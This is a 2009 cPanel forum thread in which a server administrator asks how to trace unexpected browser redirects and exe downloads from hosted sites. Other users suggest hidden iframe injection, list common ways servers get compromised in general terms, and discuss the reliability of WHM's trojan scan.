The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Virus on the server?

Discussion in 'General Discussion' started by scooby_london, Sep 28, 2009.

  1. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi Guys,

    Im running latest cpanel release in centOS 5 box and i figured out few days ago that some of my sites do dogy thigs.

    when you are pionting browser to the site (IE7) site is showing box which redirecting to another server and trying to download some exe file.

    Its not happening al the time and not for all sites.

    I've checked code of the sites and its nothing wrong with it.

    How I should find the problem?

    Any Ideas?
     
    #1 scooby_london, Sep 28, 2009
    Last edited by a moderator: Sep 28, 2009
  2. MattCurry

    MattCurry Well-Known Member

    Joined:
    Aug 18, 2009
    Messages:
    275
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Houston, Tx
    Virus on Server

    Hello,

    I am sorry to hear that you are having this issue. This does sound odd, and if you know for sure that it is not supposed to be doing that I would recommend speaking with your Data Center to see if they can help with securing the server. Please let me know if you have any other questions.

    Thank you,
    Matthew Curry
     
  3. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    I think, its nothing wrong with datacenter. I've seen that something similar happens previously to others.

    Already spoke with datacenter.

    Basically my cpanel server gets hacked and it doing that IE expoits.

    Anyone has that thing?

    What I suppose to do now?
     
  4. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    First thing you need to determine is the source of the redirects ....

    If you are seeing nothing in the site files, it is highly likely that your own computer at home is infected with a trojan or virus causing your internet connection to be hijacked erratically. This is actually fairly common and is also in use by a lot of advertisers as well who use spyware to force redirects of your internet connection.

    I would get very good virus, spyware, trojan scanners with the latest updates and do full complete scans of your computer.

    Moving on from that ....

    It is possible that your server may have also been compromised. That is a little bit more difficult to deal with and there is no magic solution I can just tell you since there are so many areas you need to check, so many things you need to review to be sure about your server. If you like though, I can give you a hand with that. ;)
     
  5. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi Spiral,

    Im 100% sure that is not my local machine problem. This has been tested in few places and it seem to be server thing.

    I'm running cpanel servers for few years and never had that thing.

    Can you tell me how to check it?

    It is quiet important for me.
     
  6. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    just runned WHM trojan horses scan:

    -Possible Trojan - /usr/bin/aspell
    -Possible Trojan - /usr/bin/prezip-bin
    -Possible Trojan - /usr/bin/word-list-compress
    -Possible Trojan - /usr/bin/cpan
    -Possible Trojan - /usr/bin/instmodsh
    -Possible Trojan - /usr/bin/prove
    -Possible Trojan - /etc/cron.daily/logrotate
    -Possible Trojan - /usr/sbin/pureauth
    -Possible Trojan - /usr/sbin/antirelayd


    Any ideas/references to those files?
     
  7. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Check your page source code on different browsers.

    - IE and firefox

    There are a few different hacks that are common, the most common lately is hidden iframes in websites. They usually are easy to find and sometimes harder to detect. They can be inserted by javascript or raw HTML. The purpose of them is usually to secretly direct the user to a site which tries to exploit the users local system and turn it into a bot or mine the users system for credit card information ,etc...


    How they modify the source of your page can be in a few different ways:
    - they have root access to your server from outdated software like a kernel
    - they have a local account exploit or another user account exploit like a vulnerable php script to upload and execute scripts
    - they have gained access to a users FTP account through stealing the password by infected the users PC with malware

    The scanning tools provided in WHM are basically completely useless, so don't rely on them.

    I suggest you hire someone to investigate your system and get this resolved. Keeping your site online will result in infecting more users and can get your site blocked from Google completely.
     
  8. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    That's not really a "Trojan" detector per say ....

    All that script really does is detects recent file changes which may in fact be perfectly normal if you received any system updates, etc.

    I wouldn't worry about any of those above.

    I received your other message and whenever I can catch up to you,
    we'll get to the bottom of things fairly quickly. ;)
     
Loading...

Share This Page